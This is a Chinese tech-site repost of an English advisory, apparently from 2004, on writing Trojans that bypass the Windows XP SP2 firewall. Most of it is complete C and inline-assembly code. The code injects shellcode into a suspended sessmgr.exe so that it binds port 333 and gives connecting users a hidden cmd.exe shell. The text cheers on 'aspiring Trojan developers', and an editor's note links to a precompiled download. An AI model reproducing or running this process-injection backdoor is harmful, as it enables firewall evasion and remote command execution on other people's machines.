首页 电脑 电脑学堂 查看内容

绕过xp sp2防火墙的代码

2004-10-16 06:24 691 0

摘要: Writing Trojans that Bypass Windows XP Service Pack 2 Firewall  Summary Windows X...
关键词: ebxpush buffer DWORD GetProcAddress len pinfo eaxpush setfp sessmgr Firewall

Writing Trojans that Bypass Windows XP Service Pack 2 Firewall  Summary Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry you aspiring Trojan developers, your still going to be able to Trojan consumer and corporate systems to your hearts content.Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall has been bypassed (it is!) telnet from another machine to the target machine on port 333 and if your connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall.  Details Exploit:#include <windows.h>#include <winsock.h>#include <stdlib.h>#include <stdio.h>#include <winsock.h>void setfp(char *buffer,int sz,DWORD from,DWORD fp){int i;for(i=0;i<sz-5;i++)if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from){*(DWORD*)(buffer+i+1)=fp;break;}}int injcode(char *buffer){HMODULE ws2_32;DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;char *code;int len;ws2_32=LoadLibrary("ws2_32");_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");_bind=(DWORD)GetProcAddress(ws2_32,"bind");_listen=(DWORD)GetProcAddress(ws2_32,"listen");_accept=(DWORD)GetProcAddress(ws2_32,"accept");__asm{call overpush '23'push '_2sw'push espmov eax,0x11111111call eaxxor ebx,ebxpush 0x64pop ecxwsadata:push ebxloop wsadatapush esppush 0x101mov eax,0x33333333call eaxpush ebxpush ebxpush ebxpush ebxpush SOCK_STREAMpush AF_INETmov eax,0x44444444call eaxmov esi,eaxpush ebxpush ebxpush ebxpush 0x4D010002 /*port 333*/mov eax,esppush 0x10push eaxpush esimov eax,0x55555555call eaxpush SOMAXCONNpush esimov eax,0x66666666call eaxpush ebxpush ebxpush esimov eax,0x77777777call eaxmov edi,eaxpush ebxpush ebxpush ebxpush ebxmov eax,esppush edipush edipush edipush ebxpush SW_HIDEpush STARTF_USESTDHANDLESpush 0xApop ecxstartupinfo:push ebxloop startupinfopush 0x44mov ecx,esppush 'dmc'mov edx, esppush eaxpush ecxpush ebxpush ebxpush ebxpush 1push ebxpush ebxpush edxpush ebxmov eax,0x22222222call eaxpush INFINITEmov eax,0x88888888call eaxover:pop eaxmov code,eax}len=0xA0;memcpy(buffer,code,len);setfp(buffer,len,0x11111111,_loadlibrarya);setfp(buffer,len,0x22222222,_createprocessa);setfp(buffer,len,0x33333333,_wsastartup);setfp(buffer,len,0x44444444,_wsasocketa);setfp(buffer,len,0x55555555,_bind);setfp(buffer,len,0x66666666,_listen);setfp(buffer,len,0x77777777,_accept);setfp(buffer,len,0x88888888,_sleep);return len;}void main(void){STARTUPINFO sinfo;PROCESS_INFORMATION pinfo;CONTEXT context;LDT_ENTRY sel;DWORD read,tib,peb,exebase,peoffs,ep;IMAGE_NT_HEADERS pehdr;int len;char sessmgr[MAX_PATH+13];char buffer[2048];GetSystemDirectory(sessmgr,MAX_PATH);sessmgr[MAX_PATH]=0;strcat(sessmgr,"\\sessmgr.exe");memset(&sinfo,0,sizeof(sinfo));sinfo.cb=sizeof(sinfo);if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))printf("createprocess failed"), exit(1);context.ContextFlags=CONTEXT_FULL;GetThreadContext(pinfo.hThread,&context);GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;len=injcode(buffer);VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);ResumeThread(pinfo.hThread);}  Additional information The information has been provided by americanidiot. 编者注:砍客联盟已经编译好了这个程序, 有兴趣的朋友可以去下载: http://www.kker.cn/down/show.asp?id=736
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部